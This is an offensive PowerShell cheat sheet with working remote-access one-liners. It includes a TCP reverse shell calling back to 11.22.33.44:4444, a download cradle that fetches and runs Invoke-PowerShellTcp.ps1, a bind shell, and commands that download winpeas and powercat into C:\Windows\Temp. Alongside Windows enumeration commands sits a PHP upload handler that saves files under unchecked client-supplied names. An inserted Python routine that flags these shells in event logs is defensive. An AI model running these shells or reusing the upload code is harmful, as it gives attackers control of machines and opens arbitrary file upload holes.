PowerShell
from cmd to powershell
reverse shell (1)
Listener (On hacker machine)
On target machine
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
reverse shell (2)
Source of ps1 scripts
listener (On hacker machine)
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444
bind Shell
setup listener on windows box
powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"
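Both the TCPClient reverse shell and the TcpListener bind shell above leave the same footprint in PowerShell script block logging (Event ID 4104): a socket object, a GetStream/Read loop, iex on the received bytes and a fake "PS ...> " prompt. The following triage routine is an added example, not part of this cheat sheet; it scores constructed 4104-style records (field names and sample text are constructed here) for the indicators those one-liners share, and requires a network primitive plus one more hit so that ordinary admin use of iex alone does not alert.

```python
import re

# Indicators drawn from the one-liners on this page, matched case-insensitively
# against the logged ScriptBlockText.
INDICATORS = {
    "tcp_socket":      r"System\.Net\.Sockets\.(TCPClient|TcpListener)",
    "stream_loop":     r"\.GetStream\(\).*\.Read\(",
    "eval":            r"\b(iex|Invoke-Expression)\b",
    "prompt_fake":     r"'PS '\s*\+\s*\(pwd\)\.Path",
    "download_cradle": r"Net\.WebClient\)\.DownloadString\(",
}

# iex by itself is common in build and admin scripts; alert only when at
# least two indicators fire and one of them is a network primitive.
NETWORK = {"tcp_socket", "download_cradle"}

def score_script_block(text):
    """Return the set of indicator names present in one ScriptBlockText."""
    return {name for name, rx in INDICATORS.items()
            if re.search(rx, text, re.IGNORECASE | re.DOTALL)}

def is_suspicious(text):
    hits = score_script_block(text)
    return len(hits) >= 2 and bool(hits & NETWORK)

# Constructed sample events (not real logs) mimicking the fields of a
# Microsoft-Windows-PowerShell/Operational Event ID 4104 record.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText":
     "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);"
     "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
     "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
     "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
     "$sendback = (iex $data 2>&1 | Out-String);"
     "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '}"},
    {"EventID": 4104, "ScriptBlockText":
     "iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');"
     "Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444"},
    {"EventID": 4104, "ScriptBlockText":
     "Get-Service | Where-Object -Property Status -eq Running"},
    {"EventID": 4104, "ScriptBlockText":
     "$cfg = Get-Content .\\build.json -Raw; iex ($cfg | ConvertFrom-Json).postBuild"},
]

def triage(events):
    """Return (index, sorted indicator names) for each suspicious 4104 event."""
    return [(i, sorted(score_script_block(e["ScriptBlockText"])))
            for i, e in enumerate(events)
            if e.get("EventID") == 4104 and is_suspicious(e["ScriptBlockText"])]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The same indicator table applies to the bind shell one-liner, since only the socket class name differs.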
run application
search command
list files
list hidden files
file search
Get-ChildItem -Path C:\ -Recurse -Force -Include *.txt
Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*
read file
present data
save into file
copy and move file
download file
download file, but not save
upload file
upload.php
<?php
// Receives the multipart field named "file" and stores it under $uploaddir.
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
search by content
show services
get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName
current working directory
check if file exist
get list of users
get list of user with details
get details of user
list local groups
get IP address
get all process
list scheduled tasks
get owner of
unzip
check .Net version
file transfers
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"